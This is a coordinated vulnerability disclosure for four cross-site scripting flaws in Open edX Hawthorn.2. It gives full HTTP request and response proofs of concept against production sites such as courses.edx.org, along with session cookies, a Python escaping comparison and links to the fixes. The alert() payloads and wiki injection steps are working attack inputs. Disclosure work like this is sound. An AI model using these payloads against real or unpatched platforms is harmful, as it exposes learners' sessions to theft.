ITAS SECURITY TEAM FOUND MULTIPLE VULNERABILITIES IN THE OPEN EDX LEARNING PLATFORM

The ITAS Security Team has found several security flaws in Open edX. Open edX is an online education platform developed by Harvard and MIT in 2012 and used by many international organizations, including Microsoft, IBM, Harvard University and Stanford University. During security testing for clients running Open edX, the ITAS Security Team discovered a number of vulnerabilities in the Open edX source code (Hawthorn.2, released 06/29/2018). The vulnerabilities include stored cross-site scripting and reflected cross-site scripting. Attackers could take advantage of these vulnerabilities to attack users of Open edX.

The ITAS Security Team reported these vulnerabilities to the vendor for fixing. The Open edX team replied to our team by email with the following information:

“After the ITAS team notified EdX of the vulnerabilities, EdX examined the claim and acknowledged a total of 4 CAT-1 security issues. ITAS continued to aid in the repair process by pointing out remaining vulnerabilities a second time. To express their appreciation, EdX has offered the ITAS team $600 USD worth of rewards. From EdX's response to ITAS: "Thank you so much for your hard work to make edx.org more secure for its millions of learners worldwide. As a non-profit open-source company we really appreciate you taking the time to find and disclose these issues to us directly."”

Cross-site scripting, also known as XSS, is 7th in the OWASP Top 10 2017. By exploiting an XSS vulnerability, attackers could steal the sessions of legitimate users to log in to the application, or interact with users' browsers to mount further attacks.

From our observation, all online education systems running the faulty version are vulnerable to attack and exploitation; examples are listed below.

  • https://courses.edx.org
  • https://openedx.microsoft.com
  • https://openedx.gse.harvard.edu
  • https://lagunita.stanford.edu
  • https://lms.mitx.mit.edu
  • https://university.redislab.com
  • https://openedx.open.ac.uk/
  • https://campus.gov.il
  • https://demo.edunext.io/

1. Application Information

Vendor : https://open.edx.org/
Download link: https://github.com/edx/edx-platform
Vulnerable version: Hawthorn.2
Fixed version: Ironwood.3
Release date: 2019-02-27

2. Vulnerabilities Information

a. Template – URL Cross Site Scripting

Vulnerability name : Reflected Cross Site Scripting
Demonstration site: https://openedx.microsoft.com/template
Affected URL : https://openedx.microsoft.com/template/{PAYLOAD}
Payload: <script>alert('XSS')</script>
Parameter type: GET
Vulnerable function: show_reference_template
Fixed link: https://github.com/edx/edx-platform/pull/19615

Proof of concept

Request

GET /template/<script>alert('XSS')</script> HTTP/1.1
Host: courses.edx.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Response

HTTP/1.1 404 Not Found
Content-Language: en
Content-Type: text/html; charset=utf-8
Date: Mon, 17 Dec 2018 09:03:38 GMT
Server: nginx
Vary: Accept-Encoding
Vary: Accept-Language, Cookie
X-Frame-Options: DENY
Content-Length: 46
Connection: Close

Missing template <script>alert('XSS')</script>

b. Xblock – Reflected Cross Site Scripting

Vulnerability name : Reflected Cross Site Scripting
Demonstration site: https://courses.edx.org/xblock/{Block_id}
Affected URL : https://courses.edx.org/xblock/{Block_id}?view={PAYLOAD}
Payload: <script>alert('XSS')</script>
Parameter name: view
Parameter type: GET
Vulnerable function: show_reference_template
Fixed link: https://github.com/edx/edx-platform/pull/19615

Proof of concept

Request

GET /xblock/block-v1:edX+DemoX+Demo_Course+type@vertical+block@vertical?view=<script>alert('XSS')</script> HTTP/1.1
Host: courses.edx.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Response

HTTP/1.1 400 Bad Request
Cache-control: no-cache="set-cookie"
Content-Language: en
Content-Type: text/html; charset=utf-8
Date: Mon, 17 Dec 2018 09:15:49 GMT
Server: nginx
Set-Cookie: AWSELB=D1EF6B6510E347E5B895826CD53CF4FD55E0CFA9A9FFA4D0509C04A79307C543BC7A564BF3102652C9DDBF45788A0111B01830935A583EAE591F65FD084E6693F1009EDC31;PATH=/;MAX-AGE=120
Vary: Accept-Language, Cookie
Content-Length: 78
Connection: Close

Rendering of the xblock view '<script>alert('XSS')</script>' is not supported.

c. Certificate – Reflected Cross Site Scripting

Vulnerability name: Reflected Cross-site Scripting
Affected URL: http://localhost/certificates/search/?user={PAYLOAD}
Sample attack pattern: <script>alert('XSS')</script>
Parameter name: user
Parameter Type: GET
Github link: https://github.com/edx/edx-platform/blob/master/lms/djangoapps/certificates/views/support.py
Vulnerable function: search_certificates(request), line 91
Condition to attack: Required staff role or higher
Fixed link: https://github.com/edx/edx-platform/pull/19519

Proof of concept

Request

GET /certificates/search/?user=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: csrftoken=YexdtVBq17ovoP4JX4z0JVJprr7Jwt8m5ftnkPEztOkctN0BjVUMtWcDxcID3Fbc; experiments_is_enterprise=false; openedx-language-preference=en; edxloggedin=true; sessionid=”1|ud7b2zkplcv2zzrbkkk06wtkq6ced7tp|qtpnFD16krkG|IjQ2MTA5N2NmNGEwOWFkNjNjNzJjNDg1MGQ4NDE5MTc1YTNiYTAwYTYzYmQ2NDg0NjgwYWQ3NDk4OTVhNDFmYzQi:1gYpH7:wa4qHQbmWjRbERxcmREcFCezcec”; edx-user-info=”{\”username\”: \”staff\”\054 \”version\”: 1\054 \”enrollmentStatusHash\”: \”09d498ab1dd69884525f4cdfa9cca6a6\”\054 \”header_urls\”: {\”learner_profile\”: \”http://192.168.1.238/u/staff\”\054 \”resume_block\”: \”http://192.168.1.238/dashboard\”\054 \”logout\”: \”http://192.168.1.238/logout\”\054 \”account_settings\”: \”http://192.168.1.238/account/settings\”}}”
Upgrade-Insecure-Requests: 1

Response

HTTP/1.1 400 Bad Request
Server: nginx
Date: Mon, 17 Dec 2018 09:34:29 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 51
Connection: close
Vary: Accept-Language, Cookie
X-Frame-Options: ALLOW
Content-Language: en
Set-Cookie: openedx-language-preference=en; expires=Mon, 31-Dec-2018 09:34:29 GMT; Max-Age=1209600; Path=/

user '<script>alert('XSS')</script>' does not exist
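The three reflected findings (a, b and c) share one defect: an attacker-controlled path or query value is interpolated into a text/html error body without HTML-escaping, so the browser executes it. The following Python is an added example, not edx-platform code; it rebuilds the three error messages quoted in this advisory with the standard library only (a Django view would apply django.utils.html.escape or format_html in the same place) and includes a check a tester can run over captured response bodies. PAYLOAD is the advisory's sample attack pattern, constructed here.

```python
"""Reflected XSS in error messages: vulnerable and hardened builders."""
from html import escape

# Constructed probe value, identical to the advisory's sample attack pattern.
PAYLOAD = "<script>alert('XSS')</script>"

# Message templates copied from the three responses shown in this advisory;
# {value} marks where the attacker-controlled path/query value is reflected.
# Each response was served as Content-Type: text/html, which is why the
# reflected markup is parsed and executed rather than shown as text.
TEMPLATES = {
    "template": "Missing template {value}",
    "xblock": "Rendering of the xblock view '{value}' is not supported.",
    "certificate": "user '{value}' does not exist",
}


def vulnerable_body(kind: str, value: str) -> str:
    """Unsafe: the raw value lands inside the HTML response body."""
    return TEMPLATES[kind].format(value=value)


def hardened_body(kind: str, value: str) -> str:
    """Safe: encode <, >, &, \" and ' before the value enters HTML."""
    return TEMPLATES[kind].format(value=escape(value, quote=True))


def reflects_unescaped(body: str, value: str) -> bool:
    """True when a probe containing markup is reflected intact in a body.

    Run this over captured responses from a test harness or scanner;
    an escaped reflection (&lt;script&gt;...) does not match.
    """
    return "<" in value and value in body


def audit(kind: str, value: str) -> dict:
    """Compare both builders for one finding and report the reflection."""
    vuln = vulnerable_body(kind, value)
    safe = hardened_body(kind, value)
    return {
        "vulnerable_reflects": reflects_unescaped(vuln, value),
        "hardened_reflects": reflects_unescaped(safe, value),
        "hardened_body": safe,
    }


if __name__ == "__main__":
    for kind in TEMPLATES:
        print(kind, audit(kind, PAYLOAD))
```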

d. Wiki – Stored Cross Site Scripting

Vulnerability name: Stored Cross-site Scripting
Affected URL : https://courses.edx.org/courses/{Course_id}/course_wiki
Sample attack pattern : <script>alert('XSS')</script>
Parameter name : content
Parameter Type : POST
Steps to reproduce : Log in as a student user and follow the steps below

Step 1: Access the course wiki by appending course_wiki to the course URL (it does not matter whether the course has a wiki or not, e.g. https://courses.edx.org/courses/course-v1:AdelaideX+ProgramX+3T2018/course_wiki)

Step 2: Click the Edit button, put the XSS payload (<script>alert('XSS')</script>) into the wiki content and save it.

Step 3: The payload pops up on https://courses.edx.org/wiki/{Course-id}/ (e.g. https://courses.edx.org/wiki/course-v1:AdelaideX+ProgramX+3T2018/)

Proof of concept

Request 1

GET /courses/course-v1:AdelaideX+ProgramX+3T2018/course_wiki HTTP/1.1
Host: courses.edx.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: __cfduid=dd721431718a63918f0bf0852e5ef08a61542883934; csrftoken=TfcOjleCHqbyXGJxLOPdkRTwsLD6iixrgr35L54daxwvAzYi7b1vw5lx9ocibtSw; optimizelyEndUserId=oeu1543736784624r0.18289740247694908; ajs_user_id=%2221697598%22; ajs_group_id=null; ajs_anonymous_id=%2233ce0d14-baab-4869-b1a2-0e550cc66925%22; ki_t=1543736796101%3B1543806787761%3B1543819835121%3B2%3B50; prod-edx-cookie-policy-viewed=true; experiments_is_enterprise=false; sailthru_hid=a0c772079f0b6ed2de5109edefd437855c04a0ec20122e70f812a608c5d1304171706d82698352ffec62a6ae; prod-edx-language-preference=en; prod-edx-csrftoken=vCmAAKia73Q0PvtiRSICwRGHQoBQ3Xbcph0MDeLZASiaQkWa8OaoSwROinyiDVl9; prod-edx-sessionid=”1|cpe7mabx3xu2f9iin3hvwuasknkzyqr0|LhDSMPmPeLXm|ImJmYmEyOGU2YjEyYWU1MmE0ZjU3N2Q5MWM5YjFiNTlhOGI4YTYyMDg0MDkxMGQwMWJkYmVjMWI5NmJiNWE4MzYi:1gW1c1:CRVkyoeUJrFVDvv05frdTNMWZs0″; edxloggedin=true; edx-jwt-cookie-header-payload=eyJhbGciOiJSUzUxMiIsImtpZCI6Imxtc3Byb2QwMDEifQ.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; edx-jwt-cookie-signature=lqvrwBViGUEij8AKc8FlWd1oa99bDtNGkmVkuobGLhE43W6qrEg2IvfzojsZnFgQiqJ3Be2D4Xp93of_qdo0AwP8EvwMdDEukqxJ68dMgFxa7e7gfLbhnCiGPYpLfdEywCQk_UerlrkPgz3WXO8hORydaNwD-bpe_yRpamZHburWw4DYJZjYIYRVaiHHc6KcaERQQLphQrD0zghp4sbd-nCIOfQcMy9mjE80Aq5jQydPJXUAlFcxC14XlR8x63P8WEV5Y0mUkEpud6wm3TnK_8oE8aCXk8OepYs1qSAtLj2tuBdSlVwuGqMkHtyTSYBchYjOAkMCQ6098POiTsLKDg; edx-jwt-refresh-cookie=B36A3caqItGpd80pKcNJKeL9fv51Os; prod-edx-user-info=”{\”username\”: \”studentdemo1\”\054 \”version\”: 1\054 \”enrollmentStatusHash\”: \”02c23d94693a6636ea722152eab98136\”\054 \”header_urls\”: {\”learner_profile\”: \”https://courses.edx.org/u/studentdemo1\”\054 \”resume_block\”: \”https://courses.edx.org/dashboard\”\054 \”logout\”: \”https://courses.edx.org/logout\”\054 \”account_settings\”: \”https://courses.edx.org/account/settings\”}}”
Upgrade-Insecure-Requests: 1

Response 1

HTTP/1.1 302 Found
Cache-control: no-cache="set-cookie"
Content-Language: en
Content-Type: text/html; charset=utf-8
Date: Sun, 09 Dec 2018 16:08:03 GMT
Location: /wiki/AdelaideX.Code101x.3T2015/
P3P: CP="edX does not have a P3P policy. Review our privacy policy at https://edx.org/privacy"
Server: nginx
Set-Cookie: prod-edx-language-preference=en; Domain=.edx.org; expires=Sun, 23-Dec-2018 16:08:03 GMT; Max-Age=1209600; Path=/
Set-Cookie: AWSELB=D1EF6B6510E347E5B895826CD53CF4FD55E0CFA9A93C0FAA65DA3F08F760218CFB1EAA2596E2F643BD06A9A0A502731C115A29A9CB909D18A431441A942FF35DD4A76CC255;PATH=/;MAX-AGE=120
Strict-Transport-Security: max-age=3600
Vary: Accept-Language, Cookie
X-Frame-Options: DENY
Content-Length: 0
Connection: Close

Request 2

POST /wiki/AdelaideX.Code101x.3T2015/_edit/ HTTP/1.1
Host: courses.edx.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://courses.edx.org/wiki/AdelaideX.Code101x.3T2015/_edit/
Content-Type: multipart/form-data; boundary=---------------------------112257516914770264881620708143
Content-Length: 954
DNT: 1
Connection: close
Cookie: __cfduid=dd721431718a63918f0bf0852e5ef08a61542883934; csrftoken=TfcOjleCHqbyXGJxLOPdkRTwsLD6iixrgr35L54daxwvAzYi7b1vw5lx9ocibtSw; optimizelyEndUserId=oeu1543736784624r0.18289740247694908; ajs_user_id=%2221697598%22; ajs_group_id=null; ajs_anonymous_id=%2233ce0d14-baab-4869-b1a2-0e550cc66925%22; ki_t=1543736796101%3B1543806787761%3B1543819835121%3B2%3B50; prod-edx-cookie-policy-viewed=true; experiments_is_enterprise=false; sailthru_hid=a0c772079f0b6ed2de5109edefd437855c04a0ec20122e70f812a608c5d1304171706d82698352ffec62a6ae; prod-edx-language-preference=en; prod-edx-csrftoken=vCmAAKia73Q0PvtiRSICwRGHQoBQ3Xbcph0MDeLZASiaQkWa8OaoSwROinyiDVl9; prod-edx-sessionid=”1|cpe7mabx3xu2f9iin3hvwuasknkzyqr0|LhDSMPmPeLXm|ImJmYmEyOGU2YjEyYWU1MmE0ZjU3N2Q5MWM5YjFiNTlhOGI4YTYyMDg0MDkxMGQwMWJkYmVjMWI5NmJiNWE4MzYi:1gW1c1:CRVkyoeUJrFVDvv05frdTNMWZs0″; edxloggedin=true; edx-jwt-cookie-header-payload=eyJhbGciOiJSUzUxMiIsImtpZCI6Imxtc3Byb2QwMDEifQ.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; edx-jwt-cookie-signature=lqvrwBViGUEij8AKc8FlWd1oa99bDtNGkmVkuobGLhE43W6qrEg2IvfzojsZnFgQiqJ3Be2D4Xp93of_qdo0AwP8EvwMdDEukqxJ68dMgFxa7e7gfLbhnCiGPYpLfdEywCQk_UerlrkPgz3WXO8hORydaNwD-bpe_yRpamZHburWw4DYJZjYIYRVaiHHc6KcaERQQLphQrD0zghp4sbd-nCIOfQcMy9mjE80Aq5jQydPJXUAlFcxC14XlR8x63P8WEV5Y0mUkEpud6wm3TnK_8oE8aCXk8OepYs1qSAtLj2tuBdSlVwuGqMkHtyTSYBchYjOAkMCQ6098POiTsLKDg; edx-jwt-refresh-cookie=B36A3caqItGpd80pKcNJKeL9fv51Os; prod-edx-user-info=”{\”username\”: \”studentdemo1\”\054 \”version\”: 1\054 \”enrollmentStatusHash\”: \”02c23d94693a6636ea722152eab98136\”\054 \”header_urls\”: {\”learner_profile\”: \”https://courses.edx.org/u/studentdemo1\”\054 \”resume_block\”: \”https://courses.edx.org/dashboard\”\054 \”logout\”: \”https://courses.edx.org/logout\”\054 \”account_settings\”: \”https://courses.edx.org/account/settings\”}}”; AWSELB=D1EF6B6510E347E5B895826CD53CF4FD55E0CFA9A93C0FAA65DA3F08F760218CFB1EAA2596E2F643BD06A9A0A502731C115A29A9CB909D18A431441A942FF35DD4A76CC255
Upgrade-Insecure-Requests: 1

-----------------------------112257516914770264881620708143
Content-Disposition: form-data; name="csrfmiddlewaretoken"

CK0hVpI1d4KR43siLr4ssdOe8sKg1y6GZWRyn9yCGb5OHWH37OgKErgfP5jsUJrL
-----------------------------112257516914770264881620708143
Content-Disposition: form-data; name="title"

Programming for Data Science
-----------------------------112257516914770264881620708143
Content-Disposition: form-data; name="content"

This is the wiki for **AdelaideX**’s _Programming for Data Science_.
<script>alert('XSS')</script>
-----------------------------112257516914770264881620708143
Content-Disposition: form-data; name="summary"

-----------------------------112257516914770264881620708143
Content-Disposition: form-data; name="current_revision"

89992
-----------------------------112257516914770264881620708143
Content-Disposition: form-data; name="save"

1
-----------------------------112257516914770264881620708143--

Response 2

HTTP/1.1 302 Found
Content-Language: en
Content-Type: text/html; charset=utf-8
Date: Sun, 09 Dec 2018 16:08:45 GMT
Location: /wiki/AdelaideX.Code101x.3T2015/
P3P: CP="edX does not have a P3P policy. Review our privacy policy at https://edx.org/privacy"
Server: nginx
Set-Cookie: prod-edx-language-preference=en; Domain=.edx.org; expires=Sun, 23-Dec-2018 16:08:45 GMT; Max-Age=1209600; Path=/
Set-Cookie: prod-edx-sessionid="1|cpe7mabx3xu2f9iin3hvwuasknkzyqr0|EPbOgM6D4T9p|ImJmYmEyOGU2YjEyYWU1MmE0ZjU3N2Q5MWM5YjFiNTlhOGI4YTYyMDg0MDkxMGQwMWJkYmVjMWI5NmJiNWE4MzYi:1gW1dN:kxL_2U1JA0cAvinLbyXEfZppkvY"; Domain=.edx.org; expires=Sun, 06-Jan-2019 16:08:45 GMT; httponly; Max-Age=2419200; Path=/; secure
Strict-Transport-Security: max-age=3600
Vary: Accept-Language, Cookie
X-Frame-Options: DENY
Content-Length: 0
Connection: Close

Request 3

GET /wiki/AdelaideX.Code101x.3T2015/ HTTP/1.1
Host: courses.edx.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://courses.edx.org/wiki/AdelaideX.Code101x.3T2015/_edit/
DNT: 1
Connection: close
Cookie: prod-edx-sessionid=”1|7ahalk3pygy48xh6l70e6j4ia96n4zet|IkblSszTjSXs|ImI5Y2FjMmY2YjZhOTk0NGVhZjBhMmE4NDFkMDA0ZDYwNDRiZDk5OTcyZTgzNGEzZjBiYmQ2MzIxYTg1OTRkNjAi:1gWg0X:V-pHtUuxjSFjVnSWN2DHssjuAYI”; csrftoken=wrJd3S6iaVCkkHNEQVVqTUywZaLtftQCZcLZiHxOD1P6NqPO443rAJTU8RelRJps; __cfduid=de755c9ba6493ba36d514c937c9f5528b1544526347; optimizelyEndUserId=oeu1544526349200r0.564235344454921; ajs_user_id=%2221697598%22; ajs_group_id=null; ajs_anonymous_id=%22de57a2d3-488b-4ada-960a-c6af0997df5b%22; experiments_is_enterprise=false; ki_t=1544526815310%3B1544526815310%3B1544526855356%3B1%3B2; edxloggedin=true; sailthru_hid=a0c772079f0b6ed2de5109edefd437855c04a0ec20122e70f812a608c5d1304171706d82698352ffec62a6ae; edx-jwt-cookie-header-payload=eyJhbGciOiJSUzUxMiIsImtpZCI6Imxtc3Byb2QwMDEifQ.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; edx-jwt-cookie-signature=kHy194pQ77QiK-gwvWsvIZvBvCHfRrJedvWHyS3SvONFx-ui8sXhZ2vZ0crVVjl-LHw9No30E_GSTmSOIiZ6Szu9MJm-0eFlOVLXziztwS7XcmfF8U2yBcLck40MuqlxLAIwAxjSDSbMNCJE0oKeNzUrFqUnTJuRYcqHmXiIHiK07hTQosEFMOXThirlJqTPFndnRUC3ZLHEsR6zlIcjW94hv_8VX3Ghf-nHGAq7t-E3b8EZgMOWw52vVKoL0xDLHSMphKVceX9w2GPzKSVUop3S5WK8yPJO3F5Zsjtj8F_ll7zeY-r-FTBqBo1MuRaQAdmQhCl0NIujNTsEEa-GKg; prod-edx-language-preference=en; edx-jwt-refresh-cookie=QplV797j5qcL5sqThFjeA4o8BwHQFN; prod-edx-user-info=”{\”username\”: \”studentdemo1\”\054 \”version\”: 1\054 \”enrollmentStatusHash\”: \”02c23d94693a6636ea722152eab98136\”\054 \”header_urls\”: {\”learner_profile\”: \”https://courses.edx.org/u/studentdemo1\”\054 \”resume_block\”: \”https://courses.edx.org/dashboard\”\054 \”logout\”: \”https://courses.edx.org/logout\”\054 \”account_settings\”: \”https://courses.edx.org/account/settings\”}}”; prod-edx-cookie-policy-viewed=true
Upgrade-Insecure-Requests: 1

Response 3

HTTP/1.1 200 OK
Cache-control: no-cache="set-cookie"
Content-Language: en
Content-Type: text/html; charset=utf-8
Date: Tue, 11 Dec 2018 11:23:58 GMT
P3P: CP="edX does not have a P3P policy. Review our privacy policy at https://edx.org/privacy"
Server: nginx
Set-Cookie: csrftoken=wrJd3S6iaVCkkHNEQVVqTUywZaLtftQCZcLZiHxOD1P6NqPO443rAJTU8RelRJps; expires=Tue, 10-Dec-2019 11:23:58 GMT; Max-Age=31449600; Path=/; secure
Set-Cookie: prod-edx-language-preference=en; Domain=.edx.org; expires=Tue, 25-Dec-2018 11:23:58 GMT; Max-Age=1209600; Path=/
Set-Cookie: AWSELB=D1EF6B6510E347E5B895826CD53CF4FD55E0CFA9A90749CECFD3E3A420861CE2F36D6BE86B832CBCF80A5BC96B29B65129A6F54A14F6993CFC88318D16B35C6A99B60FC936;PATH=/;MAX-AGE=120
Strict-Transport-Security: max-age=3600
Vary: Accept-Encoding
Vary: Accept-Language, Cookie
X-Frame-Options: DENY
Content-Length: 37551
Connection: Close

……….SNIPPET……….
<div class="wiki-article">
<p>This is the wiki for <strong>AdelaideX</strong>’s <em>Programming for Data Science</em>.
<script>alert('XSS')</script></p>
</div>
……….SNIPPET……….

 

Security Disclaimer
The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of these instructions. The author prohibits any malicious use of security-related information or exploits, by the author or elsewhere.

Information Disclosure
+ 26/11/2018: security vulnerabilities found
+ 26/12/2018: vulnerabilities sent to the software vendor
+ 18/4/2019: public disclosure
